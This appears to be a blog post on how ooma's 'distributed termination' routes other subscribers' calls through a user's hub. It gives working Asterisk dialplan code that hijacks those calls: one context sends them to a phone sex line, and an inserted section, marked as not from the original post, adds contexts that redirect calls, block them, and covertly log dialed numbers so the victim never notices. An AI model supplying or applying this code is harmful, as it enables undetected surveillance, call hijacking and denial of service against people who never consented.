If we assume that ooma's "creative director" eats the company's own dog food and uses ooma himself, then a call placed by the former TV star may eventually be routed out through our ooma hub, courtesy of the company's patent-pending "distributed termination": other subscribers' calls are terminated to the PSTN over your landline. Because the hub simply hands those calls to whatever is plugged into its landline port, an attacker who controls a hub can exploit the feature to perform various attacks, including:
- Redirecting phone calls placed by the user to different phone numbers of the attacker’s choosing
- Tracking phone calls placed by the user
- Preventing the phone from dialing
Plug the port of the Ooma hub that is supposed to connect to your landline (the wall jack) into the phone port of an ATA registered to your Asterisk server. The hub now "dials out" into Asterisk instead of into the PSTN, so every call it terminates for another subscriber becomes an ordinary inbound call on your PBX.
Assume that this ATA registers as "oomahub" to your server and that its inbound calls arrive in the context "ooma-in". In extensions.conf we may then find something like this:
[ooma-in]
; anything the hub dials with 7 or more digits lands here
exten => _XXXXXXX.,1,Goto(ooma-prank,s,1)
[ooma-prank]
; pick a prank based on the current time (Set replaces the deprecated SetVar)
exten => s,1,Set(X=$[${EPOCH} % 10])
exten => s,2,Goto(ooma-prank,prank-${X},1)
; The call will be directed to prank-0 thru prank-9
; prank 0 - send Ashton to a phone sex line
exten => prank-0,1,Answer()
exten => prank-0,2,Dial(SIP/18007232868@tf.voipmich.com)
exten => prank-0,3,Hangup()
; prank 1 - play audio clip from Ashton's classic "My Boss's Daughter"
exten => prank-1,1,Answer()
exten => prank-1,2,MP3Player(music/MyBossDaughter.mp3)
exten => prank-1,3,Hangup()
; ... other pranks here
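The pranks above only cover the first of the three attacks listed earlier. The dialplan below, added here as an example and not taken from the original post, shows one context for each of the three: silently logging and passing through the dialed number, redirecting every call to a number of the attacker's choosing, and refusing to complete the call. It assumes the same "oomahub" ATA and "ooma-in" context, plus a hypothetical SIP trunk named "pstn" that reaches the real telephone network; the redirect destination 15551234567 is a placeholder.

```ini
; Added example (not from the original post). Assumes the hub's ATA delivers
; calls to [ooma-in] and that a SIP trunk named "pstn" (hypothetical) can
; place real outbound calls. Change the Goto in [ooma-in] to pick the attack.

[ooma-in]
; every number the hub dials on its "landline" port arrives here as ${EXTEN}
exten => _XXXXXXX.,1,NoOp(ooma hub dialed ${EXTEN})
exten => _XXXXXXX.,n,Goto(ooma-track,${EXTEN},1)
; alternatives: Goto(ooma-redirect,${EXTEN},1) or Goto(ooma-block,${EXTEN},1)

[ooma-track]
; attack 2: record who was called, then complete the call so nobody notices
exten => _X.,1,Log(NOTICE,ooma call to ${EXTEN} at ${STRFTIME(${EPOCH},,%Y-%m-%d %H:%M:%S)})
exten => _X.,n,Set(CDR(userfield)=ooma-${EXTEN})
exten => _X.,n,Dial(SIP/${EXTEN}@pstn,60)
exten => _X.,n,Hangup()

[ooma-redirect]
; attack 1: ignore what was dialed and connect the caller somewhere else
exten => _X.,1,Answer()
exten => _X.,n,Dial(SIP/15551234567@pstn,60)
exten => _X.,n,Hangup()

[ooma-block]
; attack 3: never let the call through; the caller just hears congestion
exten => _X.,1,Answer()
exten => _X.,n,Wait(1)
exten => _X.,n,Congestion()
```

The tracking context is the one a subscriber would never detect: the call completes normally over the "pstn" trunk, and the only trace is the Asterisk log line and the CDR userfield on the attacker's box.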
Of course you know that this information is provided purely for entertainment purposes and that nobody should actually do this, right?
It does, however, point out a real risk of ooma's service: with "distributed termination", a subscriber's call may be completed through hardware that another subscriber owns and fully controls.